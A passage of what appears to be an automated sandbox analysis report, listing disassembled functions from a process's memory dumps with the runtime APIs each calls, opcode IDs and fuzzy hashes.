                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled_crt_debugger_hook$DebuggerPresentmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 575713630-0
                                                                                                          • Opcode ID: 131380d71292cbdd1e7ede775406d15c34c7baec596602deb65dd43663c2fca8
                                                                                                          • Instruction ID: 43a7fb16311ee2b6e534974d0fba7991ebc0de85ff498b5ef7b8aa1bfb9dd5f0
                                                                                                          • Opcode Fuzzy Hash: 131380d71292cbdd1e7ede775406d15c34c7baec596602deb65dd43663c2fca8
                                                                                                          • Instruction Fuzzy Hash: 4231E6B4D0132C9BCB65DF24D888BCDB7B8BF08324F1052DAE41DA6290DB346B958F58
                                                                                                          Function 6FD8871C Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,00000080,?,?,00000000), ref: 6FD8874C
                                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 6FD8879E
                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000,?,?,00000000), ref: 6FD887BC
                                                                                                          • _freea_s.MSVCR100(00000000,?,?,00000000), ref: 6FD887C5
                                                                                                          • malloc.MSVCR100(00000008,?,?,00000000), ref: 6FDB1410
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale$ByteCharMultiWide_freea_smalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 221122905-0
                                                                                                          • Opcode ID: 450142434750f94d8edb3a5dde7875d32abf31b5082a47b5b6c88ff026284660
                                                                                                          • Instruction ID: 7365861e799166e7df4216fb361343d9f64e1d1e12ed4da82c84a3c6db913fa4
                                                                                                          • Opcode Fuzzy Hash: 450142434750f94d8edb3a5dde7875d32abf31b5082a47b5b6c88ff026284660
                                                                                                          • Instruction Fuzzy Hash: 4921A171605228BFDF818F65DC8499F7FB9EF4A764B104126F529D6250D730E950CAA0
                                                                                                          Function 6FD865F0 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(76508410,?,?,6FD88466,?,0000000A,00000000), ref: 6FDA78BE
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(76508410,?,?,6FD88466,?,0000000A,00000000), ref: 6FDA78C8
                                                                                                          • _errno.MSVCR100(0000009C,76508410,?,?,6FD88466,?,0000000A,00000000), ref: 6FDA78D4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(0000009C,76508410,?,?,6FD88466,?,0000000A,00000000), ref: 6FDA78DE
                                                                                                          • _errno.MSVCR100(0000009C,76508410,?,?,6FD88466,?,0000000A,00000000), ref: 6FDA78EA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819658684-0
                                                                                                          • Opcode ID: f75d5ef8445d8ad6a7a9f1cda04f6debccbbf156b54398d1d2e486a0e230aedc
                                                                                                          • Instruction ID: 3692b9bd5dbbefa406aca7fbe153837088d8a254a8e85fdb8975017803368abd
                                                                                                          • Opcode Fuzzy Hash: f75d5ef8445d8ad6a7a9f1cda04f6debccbbf156b54398d1d2e486a0e230aedc
                                                                                                          • Instruction Fuzzy Hash: 512167751593C6EFD3864F3CC59068D3B559F13B64F1042BFE0A14A282D772B882CBA5
                                                                                                          Function 00D016F9 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00D01730
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00D0173C
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00D01744
                                                                                                          • GetTickCount.KERNEL32 ref: 00D0174C
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00D01758
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612452283.0000000000D01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D00000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612359297.0000000000D00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30612550523.0000000000D02000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30612649247.0000000000D04000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_d00000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                          • String ID:
                                                                                                          • API String ID: 1445889803-0
                                                                                                          • Opcode ID: 9956387d35525eabe02dc8360cc8a869ef8d7680d940a8389aa2fd890d6e0dac
                                                                                                          • Instruction ID: 13d69659c1987e5247c85bdebb0b500a3dbc53e99a66b79d78a5b61840b61cef
                                                                                                          • Opcode Fuzzy Hash: 9956387d35525eabe02dc8360cc8a869ef8d7680d940a8389aa2fd890d6e0dac
                                                                                                          • Instruction Fuzzy Hash: D411827AD01324DBDB20DBB8D84876AB7B8EB48391F550961E909E7354D6709E058BB0
                                                                                                          Function 6FDCCA9B Relevance: 7.5, APIs: 5, Instructions: 47fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _malloc_crt.MSVCR100(00000354,?,?,6FDCCBA0,?,00000000,-00000002,6FE25BD0), ref: 6FDCCAB5
                                                                                                            • Part of subcall function 6FD80B31: malloc.MSVCR100(00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD80B3D
                                                                                                          • FindClose.KERNEL32(?,?,?,6FDCCBA0,?,00000000,-00000002,6FE25BD0), ref: 6FDCCAD2
                                                                                                          • FindFirstFileExW.KERNEL32(-00000002,00000000,00000000,00000000,00000000,?,?,6FDCCBA0,?,00000000,-00000002,6FE25BD0), ref: 6FDCCAEB
                                                                                                          • FindNextFileW.KERNEL32(?,?,6FDCCBA0,?,00000000,-00000002,6FE25BD0), ref: 6FDCCB12
                                                                                                          • FindClose.KERNEL32(?,6FDCCBA0,?,00000000,-00000002,6FE25BD0), ref: 6FDCCB22
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFile$FirstNext_malloc_crtmalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1203757345-0
                                                                                                          • Opcode ID: 520feb6a2df1dafc67930b97f481067e4a9e47cc37dff4b175a382b523b3dc8b
                                                                                                          • Instruction ID: d57e673160107f7a58498c338d614509793b85a9e12ad0ecd28f95545d7f9661
                                                                                                          • Opcode Fuzzy Hash: 520feb6a2df1dafc67930b97f481067e4a9e47cc37dff4b175a382b523b3dc8b
                                                                                                          • Instruction Fuzzy Hash: 9301887100DAB0EFDF518B21EC9888A3EA9FB077B03184516F109CB150EB31B261DB91
                                                                                                          Function 6FDCC775 Relevance: 7.5, APIs: 5, Instructions: 47fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _malloc_crt.MSVCR100(00000244,00000000,?,6FDCC887,00000000,00000000,00000001,6FE27C68), ref: 6FDCC78F
                                                                                                            • Part of subcall function 6FD80B31: malloc.MSVCR100(00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD80B3D
                                                                                                          • FindClose.KERNEL32(?,00000000,?,6FDCC887,00000000,00000000,00000001,6FE27C68), ref: 6FDCC7AC
                                                                                                          • FindFirstFileExA.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,?,6FDCC887,00000000,00000000,00000001,6FE27C68), ref: 6FDCC7C5
                                                                                                          • FindNextFileA.KERNEL32(00000000,?,6FDCC887,00000000,00000000,00000001,6FE27C68), ref: 6FDCC7EC
                                                                                                          • FindClose.KERNEL32(?,6FDCC887,00000000,00000000,00000001,6FE27C68), ref: 6FDCC7FC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFile$FirstNext_malloc_crtmalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1203757345-0
                                                                                                          • Opcode ID: 103d052e1eb09837263e107b2c089236449b7e20aa7e2230a67b07a2177378ec
                                                                                                          • Instruction ID: de3478cfa4e278150392ea992fc28558c6fb030191a59d89cd0ba9ba03af6094
                                                                                                          • Opcode Fuzzy Hash: 103d052e1eb09837263e107b2c089236449b7e20aa7e2230a67b07a2177378ec
                                                                                                          • Instruction Fuzzy Hash: 5B015A30049A60EFCF915F26CD9884A3FA9FB0B7B0718461BF919CA190EB30B560DB91
                                                                                                          Function 6FD886FD Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,00000080,?,?,00000000), ref: 6FD8874C
                                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 6FD8879E
                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000,?,?,00000000), ref: 6FD887BC
                                                                                                          • _freea_s.MSVCR100(00000000,?,?,00000000), ref: 6FD887C5
                                                                                                          • malloc.MSVCR100(00000008,?,?,00000000), ref: 6FDB1410
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale$ByteCharMultiWide_freea_smalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 221122905-0
                                                                                                          • Opcode ID: 4c82690b2b19fd52c992911682b419dd0720bdcdf04490389e575411c92ceeb2
                                                                                                          • Instruction ID: f9f086daef6b578b517221a214012ce2f6362237183afad7d2203486f1d77890
                                                                                                          • Opcode Fuzzy Hash: 4c82690b2b19fd52c992911682b419dd0720bdcdf04490389e575411c92ceeb2
                                                                                                          • Instruction Fuzzy Hash: CF21C171605229EFDF418F65CC85CDEBFB5EF49674B10422AF825D62A4C731E920CB90
                                                                                                          Function 6FDBEB1A Relevance: 2.8, Strings: 2, Instructions: 250COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $$$
                                                                                                          • API String ID: 0-233714265
                                                                                                          • Opcode ID: 31c020e30ad70d81e4728ef8a546b79ab137b52650adad2008ece918569a81c1
                                                                                                          • Instruction ID: 329824932b28dda9d341dce6935a7628f0b0693f0cda8066e53b704e7e49709b
                                                                                                          • Opcode Fuzzy Hash: 31c020e30ad70d81e4728ef8a546b79ab137b52650adad2008ece918569a81c1
                                                                                                          • Instruction Fuzzy Hash: 41A13DB0A08310CFC755CF19C59491ABBF6FF88704F158A9EE89A5B256C730E946CF92
                                                                                                          Function 6FD85E20 Relevance: 1.8, Strings: 1, Instructions: 521COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID: 0-3916222277
                                                                                                          • Opcode ID: a38e635a42633b42095eead3b32d8b4eac0dce780a6505152d8a8e20ff519a99
                                                                                                          • Instruction ID: 87b30d1628e26322b0405c131beb82389b48a928dcc97f1b781aac3e3c3854a0
                                                                                                          • Opcode Fuzzy Hash: a38e635a42633b42095eead3b32d8b4eac0dce780a6505152d8a8e20ff519a99
                                                                                                          • Instruction Fuzzy Hash: 4F12B077E106198BEF05CF68D8406ECB7B2FBC9329F25866DD922BB280D7706905CB50
                                                                                                          Function 6FDA0919 Relevance: .6, Instructions: 645COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bd02719df8ffdcbb66123ace61493d0c6840e9460c98d9cc69822e938fe13a0a
                                                                                                          • Instruction ID: eb6cce38904c99975b0e5e6936d81debdc18ce7d1d056f01f6d1aa0cfb8e263a
                                                                                                          • Opcode Fuzzy Hash: bd02719df8ffdcbb66123ace61493d0c6840e9460c98d9cc69822e938fe13a0a
                                                                                                          • Instruction Fuzzy Hash: CD323732D29F014DEB639634C822329B648AFB33D4F15D737E829B6DA5EF29E4934105
                                                                                                          Function 6FE167FF Relevance: .5, Instructions: 542COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1d6bd2bd6ce08e6b6564ab8da862340406135a2993fe2058fe575a571ca9c146
                                                                                                          • Instruction ID: 112ca2a8db6755b2cff68b21e71abe8888d0b51ab5776346a9f59e5c8cd27230
                                                                                                          • Opcode Fuzzy Hash: 1d6bd2bd6ce08e6b6564ab8da862340406135a2993fe2058fe575a571ca9c146
                                                                                                          • Instruction Fuzzy Hash: 6D12E571D085248BDF24CA26CC51BEE7F71BF83328F24839ED56AA72D1DA345A81CB51
                                                                                                          Function 6FD8828B Relevance: .5, Instructions: 489COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3e04434b2b253202be8a19a5a4644d2fec5f287b413371844b0826591a86c241
                                                                                                          • Instruction ID: 3aefc8fa7c04fe5803406cd67db7b4abfe936e713ba6d89996a32d731132d4c0
                                                                                                          • Opcode Fuzzy Hash: 3e04434b2b253202be8a19a5a4644d2fec5f287b413371844b0826591a86c241
                                                                                                          • Instruction Fuzzy Hash: C102C223D4D7B28B8BB24FBD449066A7FB16E01A9130F4699DDF03F586C212FD0696E0
                                                                                                          Function 6FE08220 Relevance: .3, Instructions: 294COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f166c890233af10033b6e15e96df3a411328a7faacc95a09bb0afe4f7dc0cefe
                                                                                                          • Instruction ID: 4e031a9026a1bf4b6d7e88d34165374112040f044533e3e3939c2f970c14d07a
                                                                                                          • Opcode Fuzzy Hash: f166c890233af10033b6e15e96df3a411328a7faacc95a09bb0afe4f7dc0cefe
                                                                                                          • Instruction Fuzzy Hash: 90B1E951D2DF014CDB239539C47133AA91CAFB72D5F26D33BF91774AAAEB1952A34200
                                                                                                          Function 6FD86E24 Relevance: .1, Instructions: 95COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7ca823542d434767dfc454d6fbc13c8e7faacc0d065e19854960558e85646c42
                                                                                                          • Instruction ID: 1c1f3956b59ede0578c3cba0cd7ddbc3fe470d45da6dabd8935205c4a55cd7ed
                                                                                                          • Opcode Fuzzy Hash: 7ca823542d434767dfc454d6fbc13c8e7faacc0d065e19854960558e85646c42
                                                                                                          • Instruction Fuzzy Hash: AA31F033D9D775CB4BB64FA8818095ABB726E01BA135B8695CCE43F555C212FC078AD0
                                                                                                          Function 6FD86E28 Relevance: .1, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9608d96c399e9c37f84ed254327b0fedbb7739ff5be0a46279c7efa50d4c7723
                                                                                                          • Instruction ID: bf809961acb06003892577a0ae1ca52f699709eb5682f4b6437a455a7e073ec7
                                                                                                          • Opcode Fuzzy Hash: 9608d96c399e9c37f84ed254327b0fedbb7739ff5be0a46279c7efa50d4c7723
                                                                                                          • Instruction Fuzzy Hash: 2931FE33D9D775CB4BA24FA88180A5ABB726E01BA135B8695CCE43F555C212FC078AD0
                                                                                                          Function 6FD8839B Relevance: .1, Instructions: 90COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 55036ecb0fcb64df517c6a349dcdd9159f9398ee6ae62d10c5fb27a1f95ba203
                                                                                                          • Instruction ID: bf6ae0dfda9887bacf4375688a8d9e0e743497927d9b5627609938b460fc25c8
                                                                                                          • Opcode Fuzzy Hash: 55036ecb0fcb64df517c6a349dcdd9159f9398ee6ae62d10c5fb27a1f95ba203
                                                                                                          • Instruction Fuzzy Hash: 60310733E4E6B6CA87A2975D854455EFB736F80F953968395CCA43F148C321BD428BD0
                                                                                                          Function 6FD721F0 Relevance: .1, Instructions: 76COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                          • Instruction ID: f061c2d0d7f25019d87f3e6b49c6a4cab98b19ed44248704a199a25098c88eba
                                                                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
